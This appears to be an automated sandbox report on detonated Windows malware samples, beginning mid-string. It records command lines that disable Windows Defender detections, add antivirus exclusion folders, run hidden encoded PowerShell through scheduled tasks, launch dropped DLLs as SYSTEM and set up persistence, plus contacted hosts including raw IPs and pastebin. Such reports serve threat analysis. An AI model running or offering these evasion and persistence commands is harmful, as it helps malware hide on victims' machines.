\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LsajhStaXkJRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LsajhStaXkJRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QpigBxJgKxUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QpigBxJgKxUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YNUWFfCEdUiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YNUWFfCEdUiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oWxSecJNU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oWxSecJNU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\eiYaNjTCbhfbMeVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\eiYaNjTCbhfbMeVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\biwNYXhGTKCQxjLv\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\biwNYXhGTKCQxjLv\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\eiYaNjTCbhfbMeVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\eiYaNjTCbhfbMeVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\biwNYXhGTKCQxjLv /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\biwNYXhGTKCQxjLv /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gVvOoVbVA" /SC once /ST 02:07:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gVvOoVbVA"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gVvOoVbVA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FTlmQXMDCFpnewAuq" /SC once /ST 00:28:57 /RU "SYSTEM" /TR "\"C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe\" VS /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "FTlmQXMDCFpnewAuq"

C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe

C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe VS /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bJbhxhmwQPPePEjnjA"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oWxSecJNU\jsSbxq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zeLHdclAQOoTZxj" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "zeLHdclAQOoTZxj2" /F /xml "C:\Program Files (x86)\oWxSecJNU\GasXUvu.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "zeLHdclAQOoTZxj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "zeLHdclAQOoTZxj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KJMKKiIztyaoEB" /F /xml "C:\Program Files (x86)\YNUWFfCEdUiU2\QzjBmRy.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "xicirzYkCmkIU2" /F /xml "C:\ProgramData\eiYaNjTCbhfbMeVB\ntStZTp.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "LUmQQZwnOYWgZobiD2" /F /xml "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\fXwrAtP.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "IkWUsEdSKunoejOLGpU2" /F /xml "C:\Program Files (x86)\LsajhStaXkJRC\ircnoIG.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "dBpreMcpfXbehynYz" /SC once /ST 04:15:34 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\biwNYXhGTKCQxjLv\LUUVSPHV\nDkOWwT.dll\",#1 /site_id 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "dBpreMcpfXbehynYz"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\LUUVSPHV\nDkOWwT.dll",#1 /site_id 525403

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\LUUVSPHV\nDkOWwT.dll",#1 /site_id 525403

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "FTlmQXMDCFpnewAuq"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "dBpreMcpfXbehynYz"

Network


Files


Analysis: behavioral13

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win7-20240903-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" -s MYQXM.k

Network

Country Destination Domain Proto
US 76.95.39.48:8080 tcp
US 76.95.39.48:8080 tcp

Files


Analysis: behavioral14

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win10v2004-20241007-en

Max time kernel

90s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 380 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe C:\Windows\SysWOW64\regsvr32.exe
PID 380 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe C:\Windows\SysWOW64\regsvr32.exe
PID 380 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" -s MYQXM.k

Network


Files


Analysis: behavioral5

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\Service.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\Service.exe

"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

Network


Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe

"C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE

Network


Files


Analysis: behavioral4

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win7-20240729-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\Service.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\Service.exe

"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

Network

Country Destination Domain Proto
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.65:443 twitter.com tcp
US 104.244.42.65:443 twitter.com tcp
US 8.8.8.8:53 yandex.ru udp
RU 5.255.255.77:443 yandex.ru tcp
US 8.8.8.8:53 dzen.ru udp
RU 62.217.160.2:443 dzen.ru tcp
US 8.8.8.8:53 sso.passport.yandex.ru udp
RU 93.158.134.144:443 sso.passport.yandex.ru tcp
FI 163.123.143.4:80 163.123.143.4 tcp
NL 107.182.129.251:80 107.182.129.251 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 8.8.8.8:53 softs-portal.com udp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
